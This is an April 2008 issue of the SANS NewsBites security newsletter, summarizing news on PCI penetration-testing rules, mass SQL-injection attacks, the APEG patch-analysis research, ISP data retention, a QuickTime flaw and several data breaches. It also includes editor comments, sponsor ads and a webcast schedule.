Back to newsletter list
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Yesterday in a presentation to the Commission on Cyber Security for the
44th President, the US national Y2K Czar, John Koskinen, shared an
insight that may explain why some standards and audit techniques are
more useful than others. He told the Commission members that, near the
end of the Y2K process they were able to tell organizations exactly what
needed to be done and how much was enough. He got all the experts to
agree on what needed to be done by first finding which threats actually
mattered and then focusing the work on making sure those were
eliminated. This is relevant in security because PCI does that
(identifying which attack vectors are actually being used) and other
standards organizations, like NIST, fail to do that. PCI isn't perfect,
but a PCI audit is widely seen as much more effective than the
unreliable audits done under the looser standards. This may also by why
the NSA Blue Teams do so much better assessments than other auditors.
They know how the real attacks are being carried out so they measure
what matters.
Alan
*************************************************************************
SANS NewsBites April 29, 2008 Vol. 10, Num. 34
*************************************************************************
TOP OF THE NEWS
PCI Update Requires Both Network and Application Penetration Testing
Microsoft Says SQL-Injection Attacks Not Due to Flaws in Their
Products; Rather Due To Application Programming Errors
Researchers Call for Microsoft to Revamp Patch Distribution System
FBI Wants ISPs to Retain User Data for at Least Two Years
THE REST OF THE WEEK'S NEWS
WORMS, ACTIVE EXPLOITS, VULNERABILITIES & PATCHES
New Zero-Day Flaw in QuickTime
Malware Authors Invoke Licensing Agreements
ATTACKS, INTRUSIONS, DATA THEFT & LOSS
30,000 Bank of Ireland Customers Affected by Laptop Theft
SCSU Faces Another Data Breach
Maryland State Highway Administration Employee Data Exposed
Banking Details Stolen from NY WiseBuys Store
MISCEL***OUS
Lockheed-Martin Moves To Ensure Programmers on Federal Projects Have
Proven Secure Coding Skills
LIST OF UPCOMING FREE SANS WEBCASTS
******************** Sponsored By Sourcefire, Inc. **********************
SC Magazine Names Snort(r) "Best Network Security."
Learn how Snort is the engine powering the Sourcefire 3D(tm) System.
This IPS is different from others because it shows you everything
running on your network in real time. It also gives you context for
your security events. Know more real threats. No more wild goose
chases. Call 1.800.917.4134 today.
http://www.sans.org/info/28373
*************************************************************************
TRAINING UPDATE
Where can you find the newest Penetration Testing techniques,
Application Pen Testing, Hacker Exploits, Secure Web Application
Development, Security Essentials, Forensics, Wireless, Auditing, both
new Pen Testing courses, CISSP, and SANS' other top-rated courses plus
evening sessions with Internet Storm Center handlers.
- - SANSFIRE 2008 in Washington DC (7/22-7/31) SANS' biggest summer program
with many bonus sessions and a big exhibition of security products:
http://www.sans.org/info/26774
- - London (6/2-6/7) and Amsterdam (6/16-6/21)
http://www.sans.org/secureeurope08
- - San Diego (5/9-5/16) http://www.sans.org/securitywest08
- - Toronto (5/10-5/16) http://www.sans.org/toronto08
- - and in 100 other cites and on line any time: www.sans.org
*************************************************************************
TOP OF THE NEWS
--PCI Update Requires Both Network and Application Penetration Testing
(April 22 2007)
The Payment Card Industry Data Security Standards, which are being
closely followed by tens of thousands of governments and commercial
organizations and schools around the world, were updated to clarify what
the required penetration testing must cover: "Penetration testing is
different than the external and internal vulnerability assessments A
vulnerability assessment simply identifies and reports noted
vulnerabilities, whereas a penetration test attempts to exploit the
vulnerabilities to determine whether unauthorized access or other
malicious activity is possible. Penetration testing should include
network *and* application layer testing as well as controls and
processes around the networks and applications, and should occur from
both outside the network trying to come in (external testing) and from
inside the network. The Dark reading article also explains where best
practices for penetration testing can be learned.
http://www.darkreading.com/document.asp?doc_id=152115&WT.svl=news1_1
https://www.pcisecuritystandards.org/pdfs/04-22-08.pdf
https://www.pcisecuritystandards.org/pdfs/infosupp_11_3_penetration_testing.pdf
[Editor's Note (Paller): PCI does the best job anywhere of analyzing
attacks and updating its standards to ensure the newest attack vectors
are being adequately blocked. They did it again last week by adding
application security penetration testing to network pen testing. Sadly,
network pen testing techniques consistently fail to uncover important
application security; app pen testing requires different skills. The
best place to learn those skills is at the Web Application Security
Summit and the associated Web Application pen Testing Course in Las
Vegas in late May.
The course: http://www.sans.org/appsec08_summit/description.php?tid=1972
The overall Summit : http://www.sans.org/appsec08_summit/
--Microsoft Says SQL-Injection Attacks Not Due to Flaws in Their
Products; Rather Due To Application Programming Errors
(April 27 & 28, 2008)
Microsoft maintains that the SQL-injection attacks spreading to hundreds
of thousands of web pages are not due to new or unknown vulnerabilities
in its Internet Information Server (IIS) or SQL Server. The Microsoft
Security Response Center's Bill Sisk said the attacks are the result of
SQL injection exploits and proffered a set of industry best practices
for organizations to follow to protect themselves from such attacks.
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9080678&source=rss_topic17
http://www.news.com/8301-10784_3-9929861-7.html?part=rss&subj=news&tag=2547-1_3-0-20
http://www.heise-online.co.uk/security/Microsoft-offers-assistance-to-combat-mass-SQL-injection--/news/110616
http://blogs.technet.com/msrc/archive/2008/04/25/questions-about-web-server-attacks.aspx
[Editor's Note (Paller): The Microsoft guidance for programmers on how
to avoid programming errors that enable SQL Injection attacks (posted
at http://msdn2.microsoft.com/en-us/library/ms998271.aspx) is excellent.
These guidelines reflect the skills that are now being tested for Java
and soon for .NET programmers. If you have more than 300 programmers,
you can have up to 10 of them use the free online skills assessment to
find their skills gaps. Email spa@sans.org ]
--Researchers Call for Microsoft to Revamp Patch Distribution System
(April 23 & 25, 2008)
Computer science researchers from Carnegie Mellon University, the
University of California at Berkeley, and the University of Pittsburgh
are urging Microsoft to redesign its patch distribution system. The
four researchers have developed a technique that they call automatic
patch-based exploit generation (APEG) for comparing vulnerable and
patched versions of programs to create attack code. This technique
could be exploited to create attack code. The group offers several
suggestions for making such an attack more difficult, "including
obfuscating the code, encrypting the patches and waiting to distribute
the key simultaneously, and using peer-to-peer distribution to push out
patches faster."
http://www.securityfocus.com/news/11514
http://www.heise-online.co.uk/security/Automatic-exploits-by-patch-analysis--/news/110612
http://www.cs.cmu.edu/~dbrumley/pubs/apeg.html
--FBI Wants ISPs to Retain User Data for at Least Two Years
(April 23, 2008)
At a hearing last week, FBI Director Robert Mueller told the US House
Judiciary Committee that Internet service providers (ISPs) should be
required to retain user activity data for at least two years. The idea
has bipartisan support in the legislature. Despite the recent hearing
and earlier efforts to mandate ISP data retention, it is still unclear
what sort of information would be retained. A data retention law could
require ISPs to keep information about IP addresses assigned to users,
but could also mean that the companies have to hold on to information
related to email, instant messaging, and which web sites were visited.
Current practices have ISPs discarding data that are not required for
business reasons; exceptions are made when law enforcement authorities
are conducting an investigation.
http://www.news.com/8301-13578_3-9926803-38.html
********************** Sponsored Links: *******************************
1) Top 10 Security Vulnerabilities in your .NET configuration files:
Are your web applications vulnerable? Find out!
http://www.sans.org/info/28378
2) By converging networking and security, StillSecure provides
intelligent networks that are easy to manage and protect.
http://www.sans.org/info/28383
3) Listen to SANS Special webcast, Security Insights with Dr. Eric Cole.
This month's topic: Data Leakage prevention
http://www.sans.org/info/28388
*************************************************************************
THE REST OF THE WEEK'S NEWS
WORMS, ACTIVE EXPLOITS, VULNERABILITIES & PATCHES
--New Zero-Day Flaw in QuickTime
(April 28, 2008)
Security consultants at GNUCitizen say they have notified Apple of a
flaw in its QuickTime media player that can be exploited to take control
of vulnerable PCs. Attackers would need to manipulate users into
visiting a maliciously crafted website, or opening a malicious email
attachment or media file. The remotely exploitable vulnerability
reportedly affects Windows Vista Service Pack 1 and Windows XP Service
Pack 2; other versions may be vulnerable as well.
http://www.cio.com/article/342613/Researcher_Finds_New_F
http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml?articleID=207402200
--Malware Authors Invoke Licensing Agreements
(April 28, 2008)
In a strange twist on copyright enforcement, malware authors are taking
steps to protect their products. According to help files that accompany
one malware package, the organization selling it says that if those
using the malware violate the licensing agreement, the organization will
send code samples to anti-virus companies. The licensing agreement also
requires purchasers to pay for product updates that do not address bugs
and forbids them from reverse engineering the malware code or sharing
it with others.
http://www.theregister.co.uk/2008/04/28/malware_copyright_notice/
[Editor's Note (Schultz): The provision that if license agreements are
violated, malware authors will turn code samples over to anti-virus
vendors seems very contrary to malware authors' interests. The more code
from a malware tool that anti-virus vendors have, the better their
ability to detect and eradicate the tool is. I would think that this
would greatly diminish the potential attractiveness of the tool in the
eyes of potential buyers.
(Schmidt): I wonder if we will see them in front of "Judge Judy" someday
(A daytime US TV show were people resolve their legal disputes in a "TV
Court").]
ATTACKS, INTRUSIONS, DATA THEFT & LOSS
--30,000 Bank of Ireland Customers Affected by Laptop Theft
(April 28, 2008)
The theft of four laptops containing Bank of Ireland customer
information is now believed to affect as many as 30,000 people; the
figure was initially given as 10,000. The compromised data include
medical records, bank account information, names and addresses. The
breach affects both life assurance customers as well as mortgage holders
and affects customers at 29 branches, instead of just seven, as was
initially reported.
http://www.rte.ie/news/2008/0428/boi.html
--SCSU Faces Another Data Breach
(April 25 & 28, 2008)
Southern Connecticut State University is notifying approximately 11,000
individuals that their personal data were compromised when an intruder
gained access to a university server holding their Social Security
numbers (SSNs) and other personal information. The intruder was using
the server to help run a spam scheme. This is the second data security
breach that SCSU has faced in recent weeks; a laptop stolen from a
consultant held personally identifiable information of students at 18
colleges and universities, including SCSU.
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9080380&source=rss_topic17
http://chronicle.com/wiredcampus/index.php?id=2940
http://chronicle.com/free/2008/04/2619n.htm
[Editor's Note (Schmidt): These are happening so frequently I do not
know why this is even "News" anymore. All the more reason not to permit
social security numbers to be used as personal identifiers.]
--Maryland State Highway Administration Employee Data Exposed
(April 25, 2008)
Maryland's State Highway Administration (SHA) is informing approximately
1,800 employees that their personal information was compromised. An
employee transferred the data, which include names and SSNs, from a
secure drive to a shared drive. The SHA is removing SSNs from personnel
files.
http://www.wbaltv.com/news/15998781/detail.html
--Banking Details Stolen from NY WiseBuys Store
(April 24 & 25, 2008)
Police in Canton, New York are investigating the theft of nearly US
$100,000 that appears to stem from a computer intrusion at the Canton
WiseBuys store. The attack occurred while the store was changing from
one computer system to another in December 2007. The intruder was able
to access sensitive personal information, including bank account
numbers, of hundreds of the store's customers. The cyber thieves used
the information to create clones of the customers' cards and stole funds
from accounts at several Canton banks. The fraudulent transactions
range from US $10 up to US $3,000.
http://www.wwnytv.net/index.php/2008/04/24/feedback-police-investigate-identity-theft-of-canton-wisebuys-customers/
http://www.newswatch50.com/news/local/story.aspx?content_id=af161116-25f2-4a78-ab2e-c730e28cc4bb
http://www.watertowndailytimes.com/article/20080425/NEWS05/133127784
MISCEL***OUS
--Lockheed-Martin Moves To Ensure Programmers on Federal Projects Have
Proven Secure Coding Skills
(April 28, 2008)
Lockheed Martin has set a new standard for federal contractors by moving
to assess the secure coding skills of its programmers, provide training
to improve their skills, and certify its developers through a rigorous
certification exam.
http://www.darkreading.com/document.asp?doc_id=152167&WT.svl=wire_4
http://news.moneycentral.msn.com/ticker/article.aspx?Feed=PR&Date=20080428&ID=8549368&Symbol=US:LMT
http://www.ddj.com/cpp/207402332?cid=RSSfeed_DDJ_Cpp
UPCOMING SANS WEBCAST SCHEDULE
SANS Special Webcast: The Little Hybrid Web Worm That Could
WHEN: Wednesday, April 30, 2008 at 1:00 PM EDT (1700 UTC/GMT)
FEATURING: Billy Hoffman
http://www.sans.org/info/24614
Sponsored By: HP
This webcast examines the possibility of hybrid web worms which use
several methods to overcome the limitations of current web worms.
Specifically the authors examine how a hybrid web worm: mutates itself
to evade defenses; updates itself with new attack vectors while in the
wild; and finds and exploits targets regardless of whether they are
client web browsers or web servers.
***
WhatWorks in Intrusion Detection and Prevention: Easing the Pains of PCI
Compliance at AirTran Airways:
WHEN: Tuesday, May 06, 2008 at 1:00 PM EDT (UTC/GMT)
FEATURING: Alan Paller and Michelle Stewart
http://www.sans.org/info/27099
Sponsored By: Lancope http://www.lancope.com/
Looking for a solution to ease the pains of PCI compliance, the data
security manager for AirTran Airways needed a product that provided
increased visibility into network behavior and accountability. It had
to be behavior based and capable of collecting information from a widely
dispersed network. She found a solution that was scalable,
cost-effective and helps to quickly identify and resolve network and
security issues.
****This Webcast was previously scheduled for 4/15/08****
NEW DATE/TIME: Wednesday, May 7, 2008 at 1:00pm EDT (1700 UTC/GMT)
FEATURING: Dr. Eric Cole and Michael Yaffe
http://www.sans.org/info/25519
Sponsored By: Core Security http://www.coresecurity.com/
The information security world is taxing. We spend a lot of time fixing
problems that often don't stay fixed. New vulnerabilities are discovered
daily, and applying one update or patch sometimes exposes weaknesses
elsewhere. We hope that our IPS and firewalls can cover while we try to
keep up, but how do we really know that things are working the way they
should be?
***
Ask the Expert Webcast: Enterprise Incident Management with Security
Monitoring
WHEN: Thursday, May 8, 2008 at 1:00 PM EDT (1700 UTC/GMT)
FEATURING: Adrien de Beaupre
http://www.sans.org/info/27104
Sponsored By: Prism MicroSystems http://www.prismmicrosys.com/
Some of the issues revolving around log management include privacy,
storage requirements, and meeting regulatory or legislative
requirements. Finally, integration of LM into an organization's overall
security dashboard will be the focus of this presentation.
***
Internet Storm Center Webcast: Threat Update
WHEN: Wednesday, May 14, 2008 at 1:00 PM EDT (1700 UTC/GMT)
FEATURING: Johannes Ullrich
http://www.sans.org/info/27109
Sponsored By: Core Security http://www.coresecurity.com/
The SANS Internet Storm Center (ISC) uses advanced data correlation and
visualization techniques to analyze data collected from thousands of
sensors in over sixty countries. Experienced analysts constantly monitor
the Storm Center data feeds searching for trends and anomalies in order
to identify potential threats. When a threat is identified, the team
immediately begins an intensive investigation to gauge the threat's
severity and impact. This monthly webcast discusses recent threats
observed by the Internet Storm Center, and discusses new software
vulnerabilities or system exposures that were disclosed over the past
month. The general format is about 30 minutes of presentation by senior
ISC staff, followed by a question and answer period.
***
Security Inside the Perimeter: Confronting the Gap Between Talking About the
Threat and Doing Something About it
WHEN: Thursday, May 15, 2008 at 1:00 PM EDT (1700 UTC/GMT)
FEATURING: Paul Smith
http://www.sans.org/info/27114
Sponsored By: PacketMotion http://www.packetmotion.com/
Most security and IT professionals agree that the corporate network
"perimeter" is no longer viable due to laptops, tunneling applications,
VPNs and wireless, etc. But network security conventional wisdom is
still very perimeter oriented. Why the inconsistency? Perhaps people
really don't think the problem is that significant and the risk is not
that high. Or maybe they do think it's a real problem, but hesitate to
act because of cost, complexity, and risk to application availability.
This webinar will review the key aspects of this inconsistency and offer
solutions to better manage the "inside risk."
*******************************************************************
Be sure to check out the following FREE SANS archived webcasts:
Tool Talk Webcast: The ABC's of Dealing with Unique Network Security
Risks in a World of Open Campus Networks
WHEN: Wednesday, March 5, 2008 at 1:00 PM EST (1800 UTC/GMT)
FEATURING: Brian Mehlman
http://www.sans.org/info/22979
Sponsored By: Q1 Labs
SANS Special Webcast: A Response to the "Cold Boot Attack" Announcement
WHEN: Thursday, March 6, 2008 at 3:00 PM EST (1900 UTC/GMT)
FEATURING: John Strand
https://www.sans.org/webcasts/show.php?webcastid=91884
********************************************************************
The Editorial Board of SANS NewsBites
Eugene Schultz, Ph.D., CISM, CISSP is CTO of High Tower Software and the
author/co-author of books on Unix security, Internet security, Windows
NT/2000 security, incident response, and intrusion detection and
prevention. He was also the co-founder and original project manager of
the Department of Energy's Computer Incident Advisory Capability (CIAC).
John Pescatore is Vice President at Gartner Inc.; he has worked in
computer and network security since 1978.
Stephen Northcutt founded the GIAC certification and currently serves
as President of the SANS Technology Institute, a post graduate level IT
Security College, www.sans.edu.
Johannes Ullrich is Chief Technology Officer of the Internet Storm
Center.
Howard A. Schmidt served as CSO for Microsoft and eBay and as Vice-Chair
of the President's Critical Infrastructure Protection Board.
Ed Skoudis is co-founder of Intelguardians, a security research and
consulting firm, and author and lead instructor of the SANS Hacker
Exploits and Incident Handling course.
Tom Liston is a Senior Security Consultant and Malware Analyst for
Intelguardians, a handler for the SANS Institute's Internet Storm
Center, and co-author of the book Counter Hack Reloaded.
Dr. Eric Cole is an instructor, author and fellow with The SANS
Institute. He has written five books, including Insider Threat and he
is a senior Lockheed Martin Fellow.
Bruce Schneier has authored eight books -- including BEYOND FEAR and
SECRETS AND LIES -- and dozens of articles and academic papers. Schneier
has regularly appeared on television and radio, has testified before
Congress, and is a frequent writer and lecturer on issues surrounding
security and privacy.
Mason Brown is one of a very small number of people in the information
security field who have held a top management position in a Fortune 50
company (Alcoa). He is leading SANS' global initiative to improve
application security.
Marcus J. Ranum built the first firewall for the White House and is
widely recognized as a security products designer and industry
innovator.
Mark Weatherford, CISSP, CISM, is the Chief Information Security Officer
for the State of Colorado.
Alan Paller is director of research at the SANS Institute
Clint Kreitner is the founding President and CEO of The Center for
Internet Security.
Rohit Dhamankar is the Lead Security Architect at TippingPoint, a
division of 3Com, and authors the critical vulnerabilities section of
the weekly SANS Institute's @RISK newsletter and is the project manager
for the SANS Top20 2005 and the Top 20 Quarterly updates.
Koon Yaw Tan is Assistant Director at Monetary Authority of Singapore
(MAS) and a handler for the SANS Institute's Internet Storm Center.
Gal Shpantzer is a trusted advisor to several successful IT outsourcing
companies and was involved in multiple SANS projects, such as the
E-Warfare course and the Business Continuity Step-by-Step Guide.
Brian Honan is an independent security consultant based in Dublin,
Ireland.
Roland Grefer is an independent consultant based in Clearwater, Florida.
Please feel free to share this with interested parties via email, but
no posting is allowed on web sites. For a free subscription, (and for
free posters) or to update a current subscription, visit
http://portal.sans.org/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (Darwin)
iEYEARECAAYFAkgXTIcACgkQ+LUG5KFpTkaD6ACfRH+d0tDQpSrTOQwl6o5xON5t
+EIAnA0yVNSFZ7fb/BPQ04qdRLhLJOQW
=h7dy
-----END PGP SIGNATURE-----
